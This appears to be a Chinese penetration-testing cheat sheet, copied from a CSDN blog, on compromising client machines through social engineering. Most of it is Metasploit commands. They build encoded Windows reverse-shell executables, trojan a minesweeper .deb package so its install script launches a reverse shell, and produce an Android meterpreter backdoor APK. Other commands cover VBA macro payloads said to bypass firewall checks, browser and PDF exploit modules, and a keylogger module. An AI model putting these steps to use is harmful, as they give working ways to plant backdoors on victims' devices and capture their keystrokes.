• 在无法突破网络边界的情况下转而攻击客户端,通过社会工程学攻击,进而渗透线上业务网络
  • 含有漏洞利用代码的 web 站点
  • 含有漏洞利用代码的 doc、pdf等文档
  • 诱骗被害者执行 payload

    windows客户端

    1. #生成payload
    2. msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.121 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 9 -f exe -o 1.exe
    3. #启动apache
    4. service apache2 start
    5. cp 1.exe /var/www/html/
    6. #用msf侦听
    7. msfconsole
    8. use exploit/multi/handler
    9. set payload/windows/shell/reverse_tcp
    10. set LHOST 192.168.1.121
    11. set LPORT 4444
    12. exploit

    Linux客户端

    1. #搞个deb包
    2. apt --download-only install freesweep
    3. cd /var/cache/apt/archives #deb包在这个文件夹
    4. dpkg -x freesweep_0.90-3+b1_amd64.deb free #解包
    5. cd free/
    6. mkdir DEBIAN
    7. cd DEBIAN/
    8. #创建控制文件
    9. vi control
    10. Package: freesweep
    11. Version: 0.90-3
    12. Section: Games and Amusement
    13. Priority: optional
    14. Architecture:amd64
    15. Maintainer: Ubuntu MOTU Developers (ubuntu-motu@ lists.ubuntu.com)
    16. Description: a text-based minesweeper
    17. Freesweep isan implementation of the popular minesweeper game,whereone tries to find all the mines without igniting any, based on hints givenby the computer.Unlike most implementations of this game,Freesweepworksinanyvisualtextdispl in Linuxconsole,inanxterm,and inmost text-based terminals currently in use.
    18. #创建脚本
    19. vi postinst
    20. #!/bin/sh
    21. sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
    22. chmod 755 postinst
    23. #生成payload
    24. msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=192.168.1.121 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_scores
    25. #打包生成deb包
    26. dpkg-deb --build /root/free
    27. service apache2 start
    28. cp free.deb /var/www/html/
    29. #用msf侦听
    30. msfconsole
    31. msf > use exploit/multi/handler
    32. set payload/linux/x86/shell/reverse_tcp
    33. set LHOST 192.168.1.121
    34. set LPORT 4444
    35. exploit
    原文:https://fishpond.blog.csdn.net/article/details/105805423

    利用 Acrobat Reader 漏洞执行 payload

    1. #构造pdf文件
    2. exploit/windows/fileformat/adobe_utilprintf
    3. #构造恶意网站
    4. exploit/windows/browser/adobe_utilprintf
    5. Meterpreter
    6. use priv
    7. run post/windows/capture/keylog_recorder

    利用 flash 插件和IE浏览器漏洞执行 paylaod

    ```powershell use exploit/multi/browser/adobe_flash_hacking_team_uaf use exploit/multi/browser/adobe_flash_opaque_background_uaf use auxiliary/server/browser_autopwn2(打包了msf payload)

    IE浏览器漏洞

    use exploit/windows/browser/ms14_064_ole_code_execution
  1. <a name="MoEtt"></a>
  2. ### 利用 JRE 漏洞执行 payload
  3. ```powershell
  4. use exploit/multi/browser/java_jre17_driver_manager
  5. use exploit/multi/browser/java_jre17_jmxbean
  6. use exploit/multi/browser/java_jre17_reflection_type

生成 android 后门程序

msf > use payload/android/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set LHOST 192.168.1.121
msf payload(reverse_tcp) > generate -f a.apk -p android -t raw #要生成个apk
# 开启监听
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload/android/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.121
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > exploit

宏感染

利用宏感染 word、except 文档
绕过某些基于文件类型检查的安全机制
可以绕过win10防火墙的
生成 vbscript 脚本

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.121 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
#生成两部分内容:VBA代码和16进制payload
#用msf侦听
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload/windows/shell/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.121
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > exploit

原文:https://fishpond.blog.csdn.net/article/details/105805423